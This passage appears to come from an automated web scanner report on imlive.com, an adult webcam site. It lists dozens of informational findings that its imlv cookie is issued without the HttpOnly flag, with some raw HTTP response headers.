       <title>Disclaimer - Live Video Chat at ImLive</title>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...

11.345. http://imlive.com/live-sex-chats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.346. http://imlive.com/live-sex-chats/adult-shows/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/adult-shows/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.347. http://imlive.com/live-sex-chats/cam-girls/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.348. http://imlive.com/live-sex-chats/cam-girls/categories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/categories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.349. http://imlive.com/live-sex-chats/cam-girls/hotspots/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/hotspots/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /webcam-sign-up/
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:18:41 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2>
</body></html>

11.350. http://imlive.com/live-sex-chats/cams-aroundthehouse/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cams-aroundthehouse/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.351. http://imlive.com/live-sex-chats/caught-on-cam/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/caught-on-cam/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.352. http://imlive.com/live-sex-chats/couple/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/couple/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.353. http://imlive.com/live-sex-chats/fetish/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/fetish/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.354. http://imlive.com/live-sex-chats/fetish/categories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/fetish/categories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.355. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/free-sex-video-for-ipod/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.356. http://imlive.com/live-sex-chats/free-sex-video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/free-sex-video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoidMay82O9Ww8iIgmnpOkaYYd%2bRloG%2b4CAmxrVQ%2bGzRheecUYgUyCFOOp2ODZpcVY%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.357. http://imlive.com/live-sex-chats/gay-couple/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/gay-couple/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.358. http://imlive.com/live-sex-chats/gay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/gay/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.359. http://imlive.com/live-sex-chats/guy-alone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/guy-alone/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.360. http://imlive.com/live-sex-chats/happyhour/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/happyhour/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.361. http://imlive.com/live-sex-chats/lesbian-couple/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/lesbian-couple/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.362. http://imlive.com/live-sex-chats/lesbian/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/lesbian/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.363. http://imlive.com/live-sex-chats/live-sex-video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/live-sex-video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.364. http://imlive.com/live-sex-chats/nude-chat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/nude-chat/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.365. http://imlive.com/live-sex-chats/orgies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/orgies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.366. http://imlive.com/live-sex-chats/pornstars/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/pornstars/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.367. http://imlive.com/live-sex-chats/role-play/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/role-play/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.368. http://imlive.com/live-sex-chats/sex-show-galleries/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-galleries/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.369. http://imlive.com/live-sex-chats/sex-show-photos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-photos/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.370. http://imlive.com/live-sex-chats/sex-show-sessions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-sessions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.371. http://imlive.com/live-sex-chats/sex-video-features/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-video-features/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.372. http://imlive.com/live-sex-chats/shemale-couple/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shemale-couple/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.373. http://imlive.com/live-sex-chats/shemale/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shemale/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.374. http://imlive.com/live-sex-chats/shy-girl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shy-girl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.375. http://imlive.com/liveexperts.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/liveexperts.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 19369
Vary: Accept-Encoding

<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...

11.376. http://imlive.com/localcompanionship.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/localcompanionship.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:20 GMT
Connection: close
Content-Length: 16528
Vary: Accept-Encoding

<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...

11.377. http://imlive.com/minglesingles.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/minglesingles.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:19 GMT
Connection: close
Content-Length: 16092
Vary: Accept-Encoding

<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...

11.378. http://imlive.com/pr.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imlive.com
Path:	/pr.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

